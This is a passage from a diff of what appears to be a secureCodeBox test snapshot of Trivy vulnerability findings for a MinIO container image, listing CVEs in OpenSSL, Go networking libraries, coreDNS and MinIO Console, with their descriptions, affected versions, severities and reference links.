"https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "double free after calling PEM_read_bio_ex", + "references": [ { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2835", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2835", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", - "https://github.com/advisories/GHSA-ch7v-37xg-75ph", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", - "https://www.cve.org/CVERecord?id=CVE-2022-2835", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "coreDNS: DNS Redirection of Internal Services", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2835", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2835", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", + "value": "https://bugzilla.redhat.com/2164487", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2837", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2837", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", - "https://github.com/advisories/GHSA-h828-v5pv-33qx", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", - "https://www.cve.org/CVERecord?id=CVE-2022-2837", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "DNS Redirection of Top-Level Domains", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2837", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2837", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.28.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-33955", - "installedVersion": "v0.20.0", - "packageName": "github.com/minio/console", - "references": [ - "https://github.com/advisories/GHSA-jv3f-7m33-qp65", - "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", - "https://github.com/minio/console/releases/tag/v0.28.0", - "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", - "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", - ], - }, - "category": "Vulnerability", - "description": "Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. - -", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-33955", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://github.com/minio/console/releases/tag/v0.28.0", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - 